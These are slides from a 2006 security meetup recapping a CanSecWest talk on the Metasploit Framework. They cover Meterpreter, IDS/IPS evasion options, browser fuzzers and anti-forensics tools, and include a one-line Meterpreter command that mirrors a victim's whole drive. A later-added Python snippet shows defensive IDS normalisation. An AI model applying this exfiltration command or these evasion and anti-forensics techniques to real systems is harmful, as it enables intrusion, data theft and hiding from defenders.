A CanSecWest Presentation
Original Presenter: HD Moore
Presentation and Additional Information: Tyler Reguly
Who is this guy?
Who am I?
- Graduate of Fanshawe College, Computer Systems Technology 3-year diploma
- Previously worked at Fanshawe College in student support and as a Sys Admin for a small marketing company
- Worked doing quasi-international web development for the past 5 years
- Now at nCircle as a Vulnerability and Exposure Research Engineer
- Also a moderator on AntiOnline.com
- Maintain the ComputerDefense.org blog
© Toronto Area Security Klatch 2005
Why are we here?
The goal tonight?
- Cover information introduced by H.D. Moore at CanSecWest. We'll provide you with background information on the Metasploit Project and Metasploit Framework.
- Basic Framework usage
- Functional differences between Framework versions
- Various Metasploit Project web fuzzers
- Brief overview of other sections of the Metasploit Project
Meta-what? What is Metasploit?
- Metasploit itself is nothing... it's not even a word... but it's come to mean so much more.
- Metasploit has come to be synonymous with the Metasploit Framework.
- Metasploit is actually The Metasploit Project, whose goal is to provide information that will be useful in penetration testing, IDS signature development and exploit research.
- The Metasploit Framework is one aspect of the Metasploit Project.
- Other parts of the project include: MSRT, MAFIA, Hamachi, etc.
Metasploit Framework
- The framework is an open-source platform for developing, testing and using exploit code. (Point 'n Click Hacking)
- Similar to the commercial projects Canvas (Immunity) and Impact (Core)
- Rather than be current, aims to facilitate research and experimentation.
- The current "stable" version is version 2.5
- Primarily written in Perl, with sections that are written in C, Python and assembly.
Basic Framework Usage
- Let's take a look at a video demo of Metasploit Framework 2.5 in action
- show: list modules available (exploits, payloads, etc)
- use: use a specific exploit module
- set: set specific variables (case sensitive)
  - RHOST: Remote Host (who we're attacking)
  - PAYLOAD: the payload to carry
  - LHOST: Local Host (for the phone-home attacks, e.g. reverse shell)
- exploit: run the exploit.
Finally... Something Interesting. New version of Metasploit Framework
Framework Version 3.0 (currently @ 3.0 Alpha R3)
- Complete rewrite of V2 code... Perl migrated to Ruby
- Allows for a focus on flexibility and automation
- Multitasking through Ruby threads
- Many users can share a single instance of Metasploit
- Concurrent exploits and sessions
- Suspend, restore and share your sessions...
- Run multi-victim exploits
Exploit Mixins
- Write advanced exploits in 3 lines
- Mixins for SMB, DCERPC, HTTP, FTP, TCP, UDP, TCPServer, etc
New features... cont'd
New Interfaces
- Updated module hierarchy (much more organized); see details in video
- New web interface uses ERB and AJAX
- Developing a GUI version.
New Opcode DB
- Online database of Win32 DLL info
- Stores locations of usable 'opcodes'
- Framework integration
- CLI tool to perform queries
- 'opcode pool' system currently in the works, and automated return address updates
- Add fingerprinting and imagine!
The parts that make the whole!
Executable processing
- Msfpescan: command-line tool for EXE processing
  - Discovers usable return addresses
  - Partially used to create the opcode DB
  - Will also now handle Resources and TLBs (Translation Lookup Buffers)
- Msfrpcscan: extracts MIDL (MS Interface Definition Language) information from PE files
  - Creates boilerplate for new exploits
  - Still in development...
Huh? What did he just say?
Sounds good, but what else?
- Rewrite of all exploit modules
- Massive number of bug fixes
- Improved randomness, use of mixins
Exploit Module Structure
- Single exploit can target many platforms
- Simplified the meta-information fields
- Mixins can also modify exploit before
- Target brute forcing
- Passive exploits
Can I do anything cool?
Payload upgrades and enhancements
- Bug fixes and size improvements
- New "cmd" modules, "php" payloads
Meterpreter
- Consolidation of standard modules
- "Wicked Cool" API and remote scripting
- Process migration (Ruby, against the Meterpreter client object):
    pid = client.sys.process['calc.exe']
    client.core.migrate(pid)
- Mirror the remote hard drive in one line:
    client.fs.dir.download("/tmp/", "C:\\", true)
Meterpreter Commands
Meterpreter Commands Cont'd
There's more?!?!
The Problem...
- Not all exploits fit into the standard structure
- Recon modules overlapped with exploits
- No standard for information sharing
Auxiliary Modules
- Catch-all for interesting security tools
- Perform reconnaissance and reporting
- Integrate with third-party utilities
- Report data in a standard format
So why Ruby?
- "The Ruby Language Rocks"
- Ability to redefine anything at runtime
- Plugins can alter almost anything
Framework Plugins
- Extend and replace Framework code
- Hook events and filter parameters
- Simplify feature development
- Examples: socket tracing and filtering; multiuser exploit console
Backend
- Support for common databases: Postgres, MySQL, SQLite, etc
- Based on Ruby on Rails (ROR) ActiveRecord
- Simplified API and thread-safety
- Implementation defined by plugins
- Monitor sockets with db_tracker.rb
- Interact with the database (search, etc)
- Persistent storage of session data
- Reporting is just another plugin
Automation
Turning Metasploit into Nessus
- Database backend provides "KB" function
- Auxiliary modules for assessment/discovery
- Event coordinator for triggering modules
- Report generator uses the database
Development Status
- 75% of the database schema
- 50% of the Aux module API
- Handful of discovery modules
- Integration with Nessus/Nmap
Automation Cont'd
Creating a professional mass-rooter
- Aux modules perform discovery
- Exploit modules perform vuln checks
- Plugins automate exploitation
- Plugins automate post exploitation
- Dump XML reports via ActiveRecord
Useful framework for all security tools
- Extensive protocol support, friendly API
- Passive tools work well with event system
- Most APIs are accessible from REX
How to 'not get caught'!
Evasion is finally taken seriously
- Evasion options now a separate class
- Protocol stacks integrate IDS evasion
- Mixins expose these to exploit modules
Strong evasion techniques
- Multi-layered evasion defeats most solutions
- Client-side attacks impossible to detect: WMF = HTTP + Compress + Chunked + Jscript
- Deep protocols offer so many options: LSASS = TCP + SMB + DCERPC
Evasion Options
Example Evasion Options
- TCP::max_send_size
- TCP::send_delay
- HTTP::chunked
- HTTP::compression
- SMB::pipe_evasion
- DCERPC::bind_multi
- DCERPC::alter_context
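The layering on the previous slide (HTTP + compress + chunked, cut into small TCP sends) only defeats a sensor that matches signatures against the raw stream. As an added defender-side example, not code from the slides or from Metasploit, the Python below shows the normalization an IDS has to perform before matching: reassemble segments, decode chunked transfer encoding, then decompress gzip. The `SIGNATURE` pattern and the test traffic built by `build_layered_response` are constructed for illustration, not real rules or captures.

```python
"""Normalize a layered HTTP response before signature matching. Added example,
not code from the slides or from Metasploit: it models what an IDS must undo
when delivery uses TCP::max_send_size, HTTP::chunked and HTTP::compression."""
import gzip
import re

# Constructed placeholder pattern standing in for a real IDS content rule.
SIGNATURE = re.compile(rb"\.wmf\b")

def dechunk(body):
    """Decode a Transfer-Encoding: chunked body (the HTTP::chunked layer)."""
    out, pos = bytearray(), 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)  # drop chunk extensions
        if size == 0:
            return bytes(out)
        start = line_end + 2
        out += body[start:start + size]
        pos = start + size + 2  # skip the CRLF terminating the chunk

def normalize_http(segments):
    """Return the fully decoded body of an HTTP response split across TCP segments."""
    raw = b"".join(segments)  # reassemble; no single segment holds the whole signature
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if headers.get(b"transfer-encoding") == b"chunked":
        body = dechunk(body)
    if headers.get(b"content-encoding") == b"gzip":  # the HTTP::compression layer
        body = gzip.decompress(body)
    return body

def alerts(segments):
    """True when SIGNATURE matches the decoded body (raw-stream matching misses it)."""
    return SIGNATURE.search(normalize_http(segments)) is not None

def build_layered_response(body, chunk_size=7, seg_size=5):
    """Construct gzip'd, chunked test traffic cut into tiny TCP segments (constructed)."""
    payload = gzip.compress(body)
    pieces = [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]
    chunks = b"".join(b"%x\r\n%s\r\n" % (len(p), p) for p in pieces) + b"0\r\n\r\n"
    raw = (b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n"
           b"Content-Encoding: gzip\r\n\r\n" + chunks)
    return [raw[i:i + seg_size] for i in range(0, len(raw), seg_size)]
```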
Evasion Features
IPS Fingerprinting
- Implemented as auxiliary modules
- Use low-risk signature deltas to ID
- Linux-based IPS depends on bridging...
IPS Evasion
- Configure an 'evasion profile'
- Override exploit/evasion options
- Uses per-IPS evasion techniques
Offensive IPS
IPS Filtering for the Attacker
- Socket hooking plugins can filter data
- Not all vendors encrypt their signatures
- Let's create an application layer IPS
The "ips_filter" plugin
- Monitor all socket transactions
- Block packets that would trigger an alert
Challenges
- Signatures are often for decoded data
- Formats are difficult to convert to RE
Status
Metasploit Framework v3.0-alpha-r3
- User interfaces are still a bit rough
- Module cache a huge improvement
- Over half of the exploits are ported
- Only supports Linux / OS X / BSD
- Should work with Cygwin... but not native yet
Metasploit Framework v3.0-alpha-r4
- Includes database, plugins, aux modules
- IPS detection features, depending on time
- Was scheduled for release April 12th, has been pushed back.
Web Fuzzing
- "Newer" area in security that's actively gaining speed and evolving.
- Broad range of interest
- Has led to numerous exploits released for, and upgrades to, a number of mainstream browsers
  - Internet Explorer (April 2006): 1 patch (10 vulns/flaws)
  - Firefox (April 2006): 1 release version (1.5.0.2) (15+ vulns/flaws)
- Why are we suddenly discovering all of these?
H.D. Moore's Web Fuzzers
HD has released a series of web fuzzers:
- Hamachi: http://metasploit.com/users/hdm/tools/hamachi/hamachi.html
- CSS Die: http://metasploit.com/users/hdm/tools/see-ess-ess-die/cssdie.html
- DOM-Hanoi: http://metasploit.com/users/hdm/tools/domhanoi/domhanoi.html
Hamachi
- Created by H D Moore and Aviv Raff
- Looks for common DHTML implementation flaws
How does it work?
- Specifies common "bad" values for method arguments and property values.
Has anyone passed?
- So far Firefox 1.5.0.1 has passed all built-in Hamachi tests
Hamachi Screenshot
CSS Die
- Created by H D Moore, Aviv Raff, Matt Murphy and Thierry Zoller
- Looks for common implementation flaws in CSS1, CSS2 and CSS3.
How does it work?
- Specifies common "bad" values for style values.
Has anyone passed?
- So far Firefox 1.5.0.1 has passed all built-in CSS Die tests
CSS Die Screenshot
DOM-Hanoi
- Created by H D Moore and Aviv Raff
- Looks for common DHTML implementation flaws.
How does it work?
- It adds and removes DOM elements, similar to the way used in the game Tower of Hanoi.
Has anyone passed?
- So far there have been no browsers announced as having passed this series of tests.
DOM-Hanoi Screenshot
Latest IE, Fully Patched
Other Metasploit Projects
Metasploit Research Toolkit
- Standalone disassembler, emulator, mmu
- eEye-style return detection, input tracing
- skape has some nice blogs on the subject @ metasploit.blogspot.com
Metasploit Anti Forensics tools (MAFIA)
- Timestomp: first ever tool to modify all four NTFS timestamp values (modified, accessed, created and entry modified)
- Slacker: first ever tool to allow you to hide files in the slack space of an NTFS partition
- Sam Juicer: a tool to dump hashes from the SAM without touching the hard disk (available as a Meterpreter module)
- Transmogrify: first ever tool to defeat Encase's file signature capabilities by allowing you to mask and unmask files (coming soon)
Thank You! Thanks!